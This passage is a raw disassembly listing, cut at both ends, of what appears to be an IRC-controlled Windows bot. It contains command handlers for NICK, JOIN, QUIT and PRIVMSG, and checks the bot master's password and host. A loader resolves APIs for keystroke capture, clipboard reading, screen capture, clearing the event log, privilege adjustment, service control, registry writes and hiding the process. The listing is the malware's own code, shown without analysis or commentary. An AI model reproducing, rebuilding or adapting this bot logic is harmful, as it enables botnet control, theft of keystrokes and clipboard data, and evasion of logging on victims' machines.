DeleteFileA test eax, eax jz short loc_409367 push [ebp+arg_10] lea eax, [ebp+var_2C4] push offset dword_429F74 push 200h push eax call sub_41B980 jmp loc_409445 ; --------------------------------------------------------------------------- loc_409367: ; CODE XREF: sub_401ACD+787Aj push offset dword_42A77C call sub_41814D pop ecx push eax jmp loc_403F48 ; --------------------------------------------------------------------------- loc_409378: ; CODE XREF: sub_401ACD+3F1Cj ; sub_401ACD+3F31j push [ebp+arg_10] call sub_41B779 push eax call sub_4199CA pop ecx pop ecx push 1 pop esi push [ebp+arg_10] cmp eax, esi jnz short loc_409399 push offset unk_429F50 jmp short loc_40939E ; --------------------------------------------------------------------------- loc_409399: ; CODE XREF: sub_401ACD+78C3j push offset unk_429F20 loc_40939E: ; CODE XREF: sub_401ACD+78CAj lea eax, [ebp+var_2C4] push eax call sub_41B886 add esp, 0Ch cmp [ebp+var_8], ebx jnz loc_406D03 push ebx lea eax, [ebp+var_2C4] push [ebp+var_4] push eax push [ebp+var_88] push [ebp+arg_4] call sub_409A73 add esp, 14h jmp loc_406D03 ; --------------------------------------------------------------------------- loc_4093D7: ; CODE XREF: sub_401ACD+3EF2j ; sub_401ACD+3F07j push ebx push ebx push [ebp+arg_10] push [ebp+var_4] push ebx push [ebp+arg_4] call sub_4196BD add esp, 18h cmp eax, 1 push [ebp+arg_10] jnz short loc_4093FD push offset unk_429F00 jmp loc_406CD0 ; --------------------------------------------------------------------------- loc_4093FD: ; CODE XREF: sub_401ACD+7924j push offset unk_429ED0 jmp loc_406CD0 ; --------------------------------------------------------------------------- loc_409407: ; CODE XREF: sub_401ACD+3EC8j ; sub_401ACD+3EDDj mov esi, [ebp+arg_10] push esi call ds:dword_4CB694 ; inet_addr cmp eax, 0FFFFFFFFh mov [ebp+var_2D8], eax jz short loc_40944D push 2 lea eax, [ebp+var_2D8] push 4 push eax call ds:dword_4CB60C ; gethostbyaddr cmp eax, ebx jz short loc_409468 push dword ptr [eax] loc_409433: ; CODE XREF: sub_401ACD+7999j push esi lea eax, [ebp+var_2C4] push offset unk_429EB0 push eax call sub_41B886 loc_409445: ; CODE XREF: sub_401ACD+7895j add esp, 10h jmp loc_406CDF ; --------------------------------------------------------------------------- loc_40944D: ; CODE XREF: sub_401ACD+794Dj push esi call ds:dword_4CB6D8 ; gethostbyname cmp eax, ebx jz short loc_409468 mov eax, [eax+0Ch] mov eax, [eax] push dword ptr [eax] call ds:dword_4CB6E0 ; inet_ntoa push eax jmp short loc_409433 ; --------------------------------------------------------------------------- loc_409468: ; CODE XREF: sub_401ACD+7962j ; sub_401ACD+7989j push offset unk_429E88 jmp loc_4085D6 ; --------------------------------------------------------------------------- loc_409472: ; CODE XREF: sub_401ACD+3E9Ej ; sub_401ACD+3EB3j push 7Fh push [ebp+arg_10] push [ebp+arg_14] call sub_41B5F0 add esp, 0Ch push [ebp+arg_10] push offset unk_429E60 jmp loc_4049EC ; --------------------------------------------------------------------------- loc_40948F: ; CODE XREF: sub_401ACD+3E74j ; sub_401ACD+3E89j push 5 push ebx push ebx push [ebp+arg_10] push offset aOpen ; "open" push ebx call ds:dword_4CB5C0 push [ebp+arg_10] test eax, eax jz short loc_4094B3 push offset unk_429E40 jmp loc_406CD0 ; --------------------------------------------------------------------------- loc_4094B3: ; CODE XREF: sub_401ACD+79DAj push offset unk_429E1C jmp loc_406CD0 ; --------------------------------------------------------------------------- loc_4094BD: ; CODE XREF: sub_401ACD+3E4Aj ; sub_401ACD+3E5Fj mov eax, [ebp+arg_10] mov cl, [eax] mov byte_429094, cl movsx eax, byte ptr [eax] push eax push offset unk_429DF4 jmp loc_4049EC ; --------------------------------------------------------------------------- loc_4094D6: ; CODE XREF: sub_401ACD+3E20j ; sub_401ACD+3E35j push [ebp+arg_10] call sub_41B779 test eax, eax pop ecx jle loc_409855 push [ebp+arg_10] call sub_41B779 cmp eax, 400h pop ecx jge loc_409855 push ebx push ebx lea eax, [ebp+var_A0] push 2 push eax call sub_40B08E add esp, 10h push eax lea eax, [ebp+var_2C4] push offset dword_42BB5C push eax call sub_41B886 add esp, 0Ch jmp loc_408995 ; --------------------------------------------------------------------------- loc_409528: ; CODE XREF: sub_401ACD+3DF6j ; sub_401ACD+3E0Bj mov esi, [ebp+arg_10] push esi call sub_41B779 test eax, eax pop ecx jle loc_401E94 push esi call sub_41B779 cmp eax, 400h pop ecx jge loc_401E94 push offset aQuitLater ; "QUIT :later\r\n" push esi call sub_41B779 imul eax, 234h pop ecx push dword_43E59C[eax] call sub_409A2D pop ecx pop ecx push 1F4h call dword_427078 ; Sleep push esi call sub_41B779 imul eax, 234h pop ecx push dword_43E59C[eax] call ds:dword_4CB6EC ; closesocket push [ebp+var_10] push esi call sub_41B779 imul eax, 234h pop ecx push dword_43E5A4[eax] call dword_4270AC ; TerminateThread push esi call sub_41B779 imul eax, 234h push esi mov dword_43E5A4[eax], ebx call sub_41B779 imul eax, 234h pop ecx pop ecx mov byte ptr dword_43E390[eax], bl jmp loc_401E94 ; --------------------------------------------------------------------------- loc_4095D6: ; CODE XREF: sub_401ACD+3DCCj ; sub_401ACD+3DE1j push [ebp+arg_10] push offset aAll ; "all" call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_409642 call sub_40B2C0 cmp eax, ebx jle short loc_4095FD push eax push offset unk_429DC8 jmp loc_408CDC ; --------------------------------------------------------------------------- loc_4095FD: ; CODE XREF: sub_401ACD+7B23j push offset unk_429DA0 loc_409602: ; CODE XREF: sub_401ACD+24FAj ; sub_401ACD+2519j ... lea eax, [ebp+var_2C4] push eax call sub_41B886 pop ecx pop ecx loc_409610: ; CODE XREF: sub_401ACD+721Ej cmp [ebp+var_8], ebx jnz short loc_409631 push ebx lea eax, [ebp+var_2C4] push [ebp+var_4] push eax push [ebp+var_88] push [ebp+arg_4] loc_409629: ; CODE XREF: sub_401ACD+6DB5j call sub_409A73 add esp, 14h loc_409631: ; CODE XREF: sub_401ACD+26F7j ; sub_401ACD+2722j ... lea eax, [ebp+var_2C4] push eax call sub_4151AD jmp loc_40207D ; --------------------------------------------------------------------------- loc_409642: ; CODE XREF: sub_401ACD+7B1Aj mov eax, [ebp+var_AC] lea edi, [eax+1] cmp edi, 20h jnb loc_401E94 lea eax, [ebp+edi*4+var_90] mov [ebp+arg_24], eax loc_40965E: ; CODE XREF: sub_401ACD+7C02j mov eax, [ebp+arg_24] mov esi, [eax] cmp esi, ebx jz loc_401E94 push esi call sub_41B779 push eax call sub_40B232 pop ecx pop ecx test eax, eax push esi jz short loc_409685 push offset unk_429D7C jmp short loc_40968A ; --------------------------------------------------------------------------- loc_409685: ; CODE XREF: sub_401ACD+7BAFj push offset unk_429D50 loc_40968A: ; CODE XREF: sub_401ACD+7BB6j lea eax, [ebp+var_2C4] push eax call sub_41B886 add esp, 0Ch cmp [ebp+var_8], ebx jnz short loc_4096BA push ebx lea eax, [ebp+var_2C4] push [ebp+var_4] push eax push [ebp+var_88] push [ebp+arg_4] call sub_409A73 add esp, 14h loc_4096BA: ; CODE XREF: sub_401ACD+7BCFj lea eax, [ebp+var_2C4] push eax call sub_4151AD add [ebp+arg_24], 4 inc edi cmp edi, 20h pop ecx jb short loc_40965E jmp loc_401E94 ; --------------------------------------------------------------------------- loc_4096D6: ; CODE XREF: sub_401ACD+3DA2j ; sub_401ACD+3DB7j cmp [ebp+var_C], ebx jz loc_409855 push [ebp+arg_10] push [ebp+var_C] call sub_41B900 mov esi, eax pop ecx cmp esi, ebx pop ecx jz loc_409855 push esi push offset dword_42A4BC push [ebp+arg_4] call sub_409A2D add esp, 0Ch push esi push offset dword_429D34 jmp loc_40984E ; --------------------------------------------------------------------------- loc_409712: ; CODE XREF: sub_401ACD+3D78j ; sub_401ACD+3D8Dj push [ebp+arg_10] push offset dword_42A420 push [ebp+arg_4] call sub_409A2D add esp, 0Ch push [ebp+arg_10] push offset unk_429D10 jmp loc_40984E ; --------------------------------------------------------------------------- loc_409732: ; CODE XREF: sub_401ACD+3D4Ej ; sub_401ACD+3D63j push [ebp+esi+var_88] push [ebp+arg_10] push offset aJoinSS ; "JOIN %s %s\r\n" push [ebp+arg_4] call sub_409A2D add esp, 10h push [ebp+arg_10] push offset unk_429CEC jmp loc_40984E ; --------------------------------------------------------------------------- loc_409759: ; CODE XREF: sub_401ACD+3D24j ; sub_401ACD+3D39j push [ebp+arg_10] push offset aNickS ; "NICK %s\r\n" push [ebp+arg_4] call sub_409A2D add esp, 0Ch push [ebp+arg_10] push offset unk_429CC8 jmp loc_40984E ; --------------------------------------------------------------------------- loc_409779: ; CODE XREF: sub_401ACD+3164j ; sub_401ACD+3179j push offset aQuitReconnecti ; "QUIT :reconnecting\r\n" push [ebp+arg_4] call sub_409A2D pop ecx lea eax, [ebp+var_2C4] pop ecx push [ebp+arg_10] push offset unk_429CA4 push eax call sub_41B886 lea eax, [ebp+var_2C4] push eax call sub_4151AD push [ebp+arg_10] call sub_41B779 add esp, 14h loc_4097B3: ; CODE XREF: sub_401ACD+7D34j push eax call dword_427078 ; Sleep loc_4097BA: ; CODE XREF: sub_401ACD+2AA3j xor eax, eax jmp loc_401E97 ; --------------------------------------------------------------------------- loc_4097C1: ; CODE XREF: sub_401ACD+313Aj ; sub_401ACD+314Fj push offset aQuitReconnecti ; "QUIT :reconnecting\r\n" push [ebp+arg_4] call sub_409A2D pop ecx lea eax, [ebp+var_2C4] pop ecx push [ebp+arg_10] push offset unk_429C7C push eax call sub_41B886 lea eax, [ebp+var_2C4] push eax call sub_4151AD push [ebp+arg_10] call sub_41B779 add esp, 14h imul eax, 3E8h jmp short loc_4097B3 ; --------------------------------------------------------------------------- loc_409803: ; CODE XREF: sub_401ACD+EC9j ; sub_401ACD+EDEj push [ebp+esi+var_8C] xor eax, eax cmp [ebp+var_8F0], bl setnz al push eax lea eax, [ebp+var_338] push dword_42909C push eax call sub_40B08E add esp, 10h lea eax, [ebp+var_338] push eax push offset aNickS ; "NICK %s\r\n" push [ebp+arg_4] call sub_409A2D add esp, 0Ch lea eax, [ebp+var_338] push eax push offset unk_429C58 loc_40984E: ; CODE XREF: sub_401ACD+70B5j ; sub_401ACD+778Bj ... call sub_415221 pop ecx loc_409854: ; CODE XREF: sub_401ACD+6CBAj pop ecx loc_409855: ; CODE XREF: sub_401ACD+659j ; sub_401ACD+665j ... mov eax, [ebp+arg_24] jmp loc_401E97 ; --------------------------------------------------------------------------- loc_40985D: ; CODE XREF: sub_401ACD+AB4j ; sub_401ACD+AC9j mov esi, [ebp+esi+var_8C] cmp esi, ebx mov [ebp+arg_10], esi jz loc_401E94 cmp [ebp+var_A4], ebx jnz loc_401E94 push offset asc_42D124 ; "!" push [ebp+var_90] call sub_41C0F4 mov esi, eax push offset dword_4CB50C push ebx inc esi call sub_41C0F4 push offset asc_429C54 ; "~" push eax call sub_41C0F4 push [ebp+arg_10] mov edi, eax push offset aCool ; "cool" call sub_41C070 add esp, 20h test eax, eax jz short loc_4098FC lea eax, [ebp+var_C4] push edi push eax lea eax, [ebp+var_C4] push eax push offset aNoticeSPassAut ; "NOTICE %s :Pass auth failed (%s!%s).\r\n" push [ebp+arg_4] call sub_409A2D add esp, 14h lea eax, [ebp+var_C4] push eax push offset aNoticeSYourAtt ; "NOTICE %s :Your attempt has been logged"... push [ebp+arg_4] call sub_409A2D add esp, 0Ch push edi push esi push offset unk_429BD4 jmp loc_40240A ; --------------------------------------------------------------------------- loc_4098FC: ; CODE XREF: sub_401ACD+7DEBj mov [ebp+arg_24], offset off_429164 loc_409903: ; CODE XREF: sub_401ACD+7E52j mov eax, [ebp+arg_24] push edi push dword ptr [eax] call sub_40B450 pop ecx test eax, eax pop ecx jnz short loc_409963 add [ebp+arg_24], 4 cmp [ebp+arg_24], offset off_429168 jb short loc_409903 lea eax, [ebp+var_C4] push edi push eax lea eax, [ebp+var_C4] push eax push offset aNoticeSHostAut ; "NOTICE %s :Host Auth failed (%s!%s).\r\n" push [ebp+arg_4] call sub_409A2D add esp, 14h lea eax, [ebp+var_C4] push eax push offset aNoticeSYourAtt ; "NOTICE %s :Your attempt has been logged"... push [ebp+arg_4] call sub_409A2D add esp, 0Ch push edi push esi push offset unk_429B80 jmp loc_40240A ; --------------------------------------------------------------------------- loc_409963: ; CODE XREF: sub_401ACD+7E45j mov edi, [ebp+arg_18] xor esi, esi loc_409968: ; CODE XREF: sub_401ACD+7EC5j cmp [ebp+arg_10], ebx jz loc_401E94 cmp [edi], bl jnz short loc_409988 push [ebp+arg_10] push offset aCool ; "cool" call sub_41C070 pop ecx test eax, eax pop ecx jz short loc_409999 loc_409988: ; CODE XREF: sub_401ACD+7EA6j inc esi add edi, 80h cmp esi, 3 jl short loc_409968 jmp loc_401E94 ; --------------------------------------------------------------------------- loc_409999: ; CODE XREF: sub_401ACD+7EB9j shl esi, 7 add esi, [ebp+arg_18] lea eax, [ebp+var_E00] push 7Fh push eax push esi call sub_41B5F0 add esp, 0Ch cmp [ebp+var_8], ebx jnz short loc_4099D0 push ebx push [ebp+var_4] push offset unk_429B60 push [ebp+var_88] push [ebp+arg_4] call sub_409A73 add esp, 14h loc_4099D0: ; CODE XREF: sub_401ACD+7EE7j lea eax, [ebp+var_C4] push eax push offset unk_429B40 jmp loc_402077 ; --------------------------------------------------------------------------- loc_4099E1: ; CODE XREF: sub_401ACD+20Ej ; sub_401ACD+223j push [ebp+arg_10] push offset aUserhostS ; "USERHOST %s\r\n" push [ebp+arg_4] call sub_409A2D add esp, 0Ch push offset aXI ; "-x+i" push [ebp+arg_10] push offset aModeSS_0 ; "MODE %s %s\r\n" push [ebp+arg_4] call sub_409A2D add esp, 10h push [ebp+arg_C] push [ebp+arg_8] push offset aJoinSS ; "JOIN %s %s\r\n" push [ebp+arg_4] call sub_409A2D add esp, 10h mov ds:dword_4CB504, edi jmp loc_401D6A sub_401ACD endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_409A2D proc near ; CODE XREF: sub_401955+3Dp ; sub_401ACD+1CBp ... var_200 = byte ptr -200h arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = byte ptr 10h push ebp mov ebp, esp sub esp, 200h lea eax, [ebp+arg_8] push eax lea eax, [ebp+var_200] push [ebp+arg_4] push 200h push eax call sub_41C190 add esp, 10h lea eax, [ebp+var_200] push 0 push eax call sub_41AFE0 pop ecx push eax lea eax, [ebp+var_200] push eax push [ebp+arg_0] call ds:dword_4CB6A4 ; send leave retn sub_409A2D endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_409A73 proc near ; CODE XREF: sub_401ACD+518p ; sub_401ACD+137Ep ... var_400 = byte ptr -400h var_200 = byte ptr -200h arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = dword ptr 18h push ebp mov ebp, esp sub esp, 400h cmp [ebp+arg_C], 0 push esi push edi mov edi, offset aNotice ; "NOTICE" jnz short loc_409A8E mov edi, offset aPrivmsg ; "PRIVMSG" loc_409A8E: ; CODE XREF: sub_409A73+14j push edi call sub_41AFE0 push [ebp+arg_4] mov esi, 1FAh sub esi, eax call sub_41AFE0 pop ecx sub esi, eax pop ecx lea eax, [ebp+var_400] push [ebp+arg_8] push offset aS_2 ; "%s" push esi push eax call sub_41B980 add esp, 10h lea eax, [ebp+var_400] push eax lea eax, [ebp+var_200] push [ebp+arg_4] push edi push offset aSSS_0 ; "%s %s :%s\r\n" push eax call sub_41B886 add esp, 14h lea eax, [ebp+var_200] push 0 push eax call sub_41AFE0 pop ecx push eax lea eax, [ebp+var_200] push eax push [ebp+arg_0] call ds:dword_4CB6A4 ; send cmp [ebp+arg_10], 0 pop edi pop esi jz short locret_409B11 push 7D0h call dword_427078 ; Sleep locret_409B11: ; CODE XREF: sub_409A73+91j leave retn sub_409A73 endp ; =============== S U B R O U T I N E ======================================= sub_409B13 proc near ; CODE XREF: sub_401221+4Bp push ebx push ebp mov ebp, dword_42709C push esi push edi push offset aKernel32_dll ; "kernel32.dll" call ebp ; GetModuleHandleA mov esi, dword_4270BC mov edi, eax xor ebx, ebx cmp edi, ebx jz loc_409C33 push offset aSeterrormode ; "SetErrorMode" push edi call esi ; GetProcAddress push offset aCreatetoolhelp ; "CreateToolhelp32Snapshot" push edi mov ds:dword_4CB700, eax call esi ; GetProcAddress push offset aProcess32first ; "Process32First" push edi mov ds:dword_4CB674, eax call esi ; GetProcAddress push offset aProcess32next ; "Process32Next" push edi mov ds:dword_4CB658, eax call esi ; GetProcAddress push offset aModule32first ; "Module32First" push edi mov ds:dword_4CB568, eax call esi ; GetProcAddress push offset aGetdiskfreespa ; "GetDiskFreeSpaceExA" push edi mov ds:dword_4CB514, eax call esi ; GetProcAddress push offset aGetlogicaldriv ; "GetLogicalDriveStringsA" push edi mov ds:dword_4CB544, eax call esi ; GetProcAddress push offset aGetdrivetypea ; "GetDriveTypeA" push edi mov ds:dword_4CB5BC, eax call esi ; GetProcAddress push offset aSearchpatha ; "SearchPathA" push edi mov ds:dword_4CB6B4, eax call esi ; GetProcAddress push offset aQueryperforman ; "QueryPerformanceCounter" push edi mov ds:dword_4CB710, eax call esi ; GetProcAddress push offset aQueryperform_0 ; "QueryPerformanceFrequency" push edi mov ds:dword_4CB574, eax call esi ; GetProcAddress cmp ds:dword_4CB700, ebx mov ds:dword_4CB55C, eax jz short loc_409C11 cmp ds:dword_4CB674, ebx jz short loc_409C11 cmp ds:dword_4CB658, ebx jz short loc_409C11 cmp ds:dword_4CB568, ebx jz short loc_409C11 cmp ds:dword_4CB544, ebx jz short loc_409C11 cmp ds:dword_4CB5BC, ebx jz short loc_409C11 cmp ds:dword_4CB6B4, ebx jz short loc_409C11 cmp ds:dword_4CB710, ebx jz short loc_409C11 cmp ds:dword_4CB574, ebx jz short loc_409C11 cmp eax, ebx jnz short loc_409C1B loc_409C11: ; CODE XREF: sub_409B13+B8j ; sub_409B13+C0j ... mov ds:dword_4CB714, 1 loc_409C1B: ; CODE XREF: sub_409B13+FCj push offset aRegisterservic ; "RegisterServiceProcess" push edi call esi ; GetProcAddress cmp eax, ebx mov ds:dword_4CB68C, eax jz short loc_409C48 push 1 push ebx call eax jmp short loc_409C48 ; --------------------------------------------------------------------------- loc_409C33: ; CODE XREF: sub_409B13+1Dj call dword_42708C ; RtlGetLastWin32Error mov ds:dword_4CB718, eax mov ds:dword_4CB714, 1 loc_409C48: ; CODE XREF: sub_409B13+117j ; sub_409B13+11Ej push offset aUser32_dll ; "user32.dll" call dword_4270B8 ; LoadLibraryA mov edi, eax cmp edi, ebx jz loc_409D5D push offset aSendmessagea ; "SendMessageA" push edi call esi ; GetProcAddress push offset aFindwindowa ; "FindWindowA" push edi mov ds:dword_4CB6B0, eax call esi ; GetProcAddress push offset aIswindow ; "IsWindow" push edi mov ds:dword_4CB660, eax call esi ; GetProcAddress push offset aDestroywindow ; "DestroyWindow" push edi mov ds:dword_4CB5F4, eax call esi ; GetProcAddress push offset aOpenclipboard ; "OpenClipboard" push edi mov ds:dword_4CB704, eax call esi ; GetProcAddress push offset aGetclipboardda ; "GetClipboardData" push edi mov ds:dword_4CB624, eax call esi ; GetProcAddress push offset aCloseclipboard ; "CloseClipboard" push edi mov ds:dword_4CB644, eax call esi ; GetProcAddress push offset aExitwindowsex ; "ExitWindowsEx" push edi mov ds:dword_4CB6A8, eax call esi ; GetProcAddress cmp ds:dword_4CB6B0, ebx mov ds:dword_4CB594, eax jz short loc_409D01 cmp ds:dword_4CB660, ebx jz short loc_409D01 cmp ds:dword_4CB5F4, ebx jz short loc_409D01 cmp ds:dword_4CB704, ebx jz short loc_409D01 cmp ds:dword_4CB624, ebx jz short loc_409D01 cmp ds:dword_4CB644, ebx jz short loc_409D01 cmp ds:dword_4CB6A8, ebx jz short loc_409D01 cmp eax, ebx jnz short loc_409D0B loc_409D01: ; CODE XREF: sub_409B13+1B8j ; sub_409B13+1C0j ... mov ds:dword_4CB71C, 1 loc_409D0B: ; CODE XREF: sub_409B13+1ECj push offset aGetasynckeysta ; "GetAsyncKeyState" push edi call esi ; GetProcAddress push offset aGetkeystate ; "GetKeyState" push edi mov ds:dword_4CB620, eax call esi ; GetProcAddress push offset aGetwindowtexta ; "GetWindowTextA" push edi mov ds:dword_4CB528, eax call esi ; GetProcAddress push offset aGetforegroundw ; "GetForegroundWindow" push edi mov ds:dword_4CB5F0, eax call esi ; GetProcAddress cmp ds:dword_4CB620, ebx mov ds:dword_4CB5D8, eax jz short loc_409D68 cmp ds:dword_4CB528, ebx jz short loc_409D68 cmp ds:dword_4CB5F0, ebx jz short loc_409D68 cmp eax, ebx jnz short loc_409D72 jmp short loc_409D68 ; --------------------------------------------------------------------------- loc_409D5D: ; CODE XREF: sub_409B13+144j call dword_42708C ; RtlGetLastWin32Error mov ds:dword_4CB720, eax loc_409D68: ; CODE XREF: sub_409B13+232j ; sub_409B13+23Aj ... mov ds:dword_4CB71C, 1 loc_409D72: ; CODE XREF: sub_409B13+246j push offset aAdvapi32_dll ; "advapi32.dll" call ebp ; GetModuleHandleA mov edi, eax cmp edi, ebx jz loc_409F2B push offset aRegopenkeyexa ; "RegOpenKeyExA" push edi call esi ; GetProcAddress push offset aRegcreatekeyex ; "RegCreateKeyExA" push edi mov ds:dword_4CB6C4, eax call esi ; GetProcAddress push offset aRegsetvalueexa ; "RegSetValueExA" push edi mov ds:dword_4CB608, eax call esi ; GetProcAddress push offset aRegqueryvaluee ; "RegQueryValueExA" push edi mov ds:dword_4CB678, eax call esi ; GetProcAddress push offset aRegdeletevalue ; "RegDeleteValueA" push edi mov ds:dword_4CB554, eax call esi ; GetProcAddress push offset aRegclosekey ; "RegCloseKey" push edi mov ds:dword_4CB5B8, eax call esi ; GetProcAddress push offset aOpeneventloga ; "OpenEventLogA" push edi mov ds:dword_4CB630, eax call esi ; GetProcAddress push offset aCleareventloga ; "ClearEventLogA" push edi mov ds:dword_4CB5D4, eax call esi ; GetProcAddress cmp ds:dword_4CB6C4, ebx mov ds:dword_4CB5E4, eax jz short loc_409E1B cmp ds:dword_4CB608, ebx jz short loc_409E1B cmp ds:dword_4CB678, ebx jz short loc_409E1B cmp ds:dword_4CB554, ebx jz short loc_409E1B cmp ds:dword_4CB5B8, ebx jz short loc_409E1B cmp ds:dword_4CB630, ebx jnz short loc_409E25 loc_409E1B: ; CODE XREF: sub_409B13+2DEj ; sub_409B13+2E6j ... mov ds:dword_4CB724, 1 loc_409E25: ; CODE XREF: sub_409B13+306j push offset aOpenprocesstok ; "OpenProcessToken" push edi call esi ; GetProcAddress push offset aLookupprivileg ; "LookupPrivilegeValueA" push edi mov ds:dword_4CB638, eax call esi ; GetProcAddress push offset aAdjusttokenpri ; "AdjustTokenPrivileges" push edi mov ds:dword_4CB610, eax call esi ; GetProcAddress cmp ds:dword_4CB638, ebx mov ds:dword_4CB6C0, eax jz short loc_409E60 cmp ds:dword_4CB610, ebx jz short loc_409E60 cmp eax, ebx jnz short loc_409E6A loc_409E60: ; CODE XREF: sub_409B13+33Fj ; sub_409B13+347j mov ds:dword_4CB724, 1 loc_409E6A: ; CODE XREF: sub_409B13+34Bj push offset aOpenscmanagera ; "OpenSCManagerA" push edi call esi ; GetProcAddress push offset aOpenservicea ; "OpenServiceA" push edi mov ds:dword_4CB648, eax call esi ; GetProcAddress push offset aStartservicea ; "StartServiceA" push edi mov ds:dword_4CB530, eax call esi ; GetProcAddress push offset aControlservice ; "ControlService" push edi mov ds:dword_4CB538, eax call esi ; GetProcAddress push offset aDeleteservice ; "DeleteService" push edi mov ds:dword_4CB59C, eax call esi ; GetProcAddress push offset aCloseserviceha ; "CloseServiceHandle" push edi mov ds:dword_4CB5A0, eax call esi ; GetProcAddress push offset aEnumservicesst ; "EnumServicesStatusA" push edi mov ds:dword_4CB54C, eax call esi ; GetProcAddress push offset aIsvalidsecurit ; "IsValidSecurityDescriptor" push edi mov ds:dword_4CB614, eax call esi ; GetProcAddress cmp ds:dword_4CB648, ebx mov ds:dword_4CB53C, eax jz short loc_409F0E cmp ds:dword_4CB530, ebx jz short loc_409F0E cmp ds:dword_4CB538, ebx jz short loc_409F0E cmp ds:dword_4CB59C, ebx jz short loc_409F0E cmp ds:dword_4CB5A0, ebx jz short loc_409F0E cmp ds:dword_4CB54C, ebx jz short loc_409F0E cmp ds:dword_4CB614, ebx jz short loc_409F0E cmp eax, ebx jnz short loc_409F18 loc_409F0E: ; CODE XREF: sub_409B13+3C5j ; sub_409B13+3CDj ... mov ds:dword_4CB724, 1 loc_409F18: ; CODE XREF: sub_409B13+3F9j push offset aGetusernamea ; "GetUserNameA" push edi call esi ; GetProcAddress cmp eax, ebx mov ds:dword_4CB534, eax jnz short loc_409F40 jmp short loc_409F36 ; --------------------------------------------------------------------------- loc_409F2B: ; CODE XREF: sub_409B13+26Aj call dword_42708C ; RtlGetLastWin32Error mov ds:dword_4CB728, eax loc_409F36: ; CODE XREF: sub_409B13+416j mov ds:dword_4CB724, 1 loc_409F40: ; CODE XREF: sub_409B13+414j push offset aGdi32_dll ; "gdi32.dll" call ebp ; GetModuleHandleA mov edi, eax cmp edi, ebx jz loc_40A00C push offset aCreatedca ; "CreateDCA" push edi call esi ; GetProcAddress push offset aCreatedibsecti ; "CreateDIBSection" push edi mov ds:dword_4CB640, eax call esi ; GetProcAddress push offset aCreatecompatib ; "CreateCompatibleDC" push edi mov ds:dword_4CB698, eax call esi ; GetProcAddress push offset aGetdevicecaps ; "GetDeviceCaps" push edi mov ds:dword_4CB6A0, eax call esi ; GetProcAddress push offset aGetdibcolortab ; "GetDIBColorTable" push edi mov ds:dword_4CB65C, eax call esi ; GetProcAddress push offset aSelectobject ; "SelectObject" push edi mov ds:dword_4CB578, eax call esi ; GetProcAddress push offset aBitblt ; "BitBlt" push edi mov ds:dword_4CB524, eax call esi ; GetProcAddress push offset aDeletedc ; "DeleteDC" push edi mov ds:dword_4CB69C, eax call esi ; GetProcAddress push offset aDeleteobject ; "DeleteObject" push edi mov ds:dword_4CB510, eax call esi ; GetProcAddress cmp ds:dword_4CB640, ebx mov ds:dword_4CB5B0, eax jz short loc_40A017 cmp ds:dword_4CB698, ebx jz short loc_40A017 cmp ds:dword_4CB6A0, ebx jz short loc_40A017 cmp ds:dword_4CB65C, ebx jz short loc_40A017 cmp ds:dword_4CB578, ebx jz short loc_40A017 cmp ds:dword_4CB524, ebx jz short loc_40A017 cmp ds:dword_4CB69C, ebx jz short loc_40A017 cmp ds:dword_4CB510, ebx jz short loc_40A017 cmp eax, ebx jnz short loc_40A021 jmp short loc_40A017 ; --------------------------------------------------------------------------- loc_40A00C: ; CODE XREF: sub_409B13+438j call dword_42708C ; RtlGetLastWin32Error mov ds:dword_4CB730, eax loc_40A017: ; CODE XREF: sub_409B13+4B9j ; sub_409B13+4C1j ... mov ds:dword_4CB72C, 1 loc_40A021: ; CODE XREF: sub_409B13+4F5j mov ebp, dword_4270B8 push offset aWs2_32_dll ; "ws2_32.dll" call ebp ; LoadLibraryA mov edi, eax cmp edi, ebx jz loc_40A2DD push offset aWsastartup ; "WSAStartup" push edi call esi ; GetProcAddress push offset aWsasocketa ; "WSASocketA" push edi mov ds:dword_4CB5C4, eax call esi ; GetProcAddress push offset aWsaasyncselect ; "WSAAsyncSelect" push edi mov ds:dword_4CB6F8, eax call esi ; GetProcAddress push offset a__wsafdisset ; "__WSAFDIsSet" push edi mov ds:dword_4CB564, eax call esi ; GetProcAddress push offset aWsaioctl ; "WSAIoctl" push edi mov ds:dword_4CB540, eax call esi ; GetProcAddress push offset aWsagetlasterro ; "WSAGetLastError" push edi mov ds:dword_4CB600, eax call esi ; GetProcAddress push offset aWsacleanup ; "WSACleanup" push edi mov ds:dword_4CB5E8, eax call esi ; GetProcAddress push offset aSocket ; "socket" push edi mov ds:dword_4CB5AC, eax call esi ; GetProcAddress push offset aIoctlsocket ; "ioctlsocket" push edi mov ds:dword_4CB6D4, eax call esi ; GetProcAddress push offset aConnect ; "connect" push edi mov ds:dword_4CB6F0, eax call esi ; GetProcAddress push offset aInet_ntoa ; "inet_ntoa" push edi mov ds:dword_4CB5FC, eax call esi ; GetProcAddress push offset aInet_addr ; "inet_addr" push edi mov ds:dword_4CB6E0, eax call esi ; GetProcAddress push offset aHtons ; "htons" push edi mov ds:dword_4CB694, eax call esi ; GetProcAddress push offset aHtonl ; "htonl" push edi mov ds:dword_4CB654, eax call esi ; GetProcAddress push offset aNtohs ; "ntohs" push edi mov ds:dword_4CB650, eax call esi ; GetProcAddress push offset aNtohl ; "ntohl" push edi mov ds:dword_4CB584, eax call esi ; GetProcAddress push offset aSend ; "send" push edi mov ds:dword_4CB57C, eax call esi ; GetProcAddress push offset aSendto ; "sendto" push edi mov ds:dword_4CB6A4, eax call esi ; GetProcAddress push offset aRecv ; "recv" push edi mov ds:dword_4CB6B8, eax call esi ; GetProcAddress push offset aRecvfrom ; "recvfrom" push edi mov ds:dword_4CB66C, eax call esi ; GetProcAddress mov ds:dword_4CB62C, eax push offset aBind ; "bind" push edi call esi ; GetProcAddress push offset aSelect ; "select" push edi mov ds:dword_4CB680, eax call esi ; GetProcAddress push offset aListen ; "listen" push edi mov ds:dword_4CB63C, eax call esi ; GetProcAddress push offset aAccept ; "accept" push edi mov ds:dword_4CB67C, eax call esi ; GetProcAddress push offset aSetsockopt ; "setsockopt" push edi mov ds:dword_4CB6E8, eax call esi ; GetProcAddress push offset aGetsockname ; "getsockname" push edi mov ds:dword_4CB634, eax call esi ; GetProcAddress push offset aGethostname ; "gethostname" push edi mov ds:dword_4CB5F8, eax call esi ; GetProcAddress push offset aGethostbyname ; "gethostbyname" push edi mov ds:dword_4CB668, eax call esi ; GetProcAddress push offset 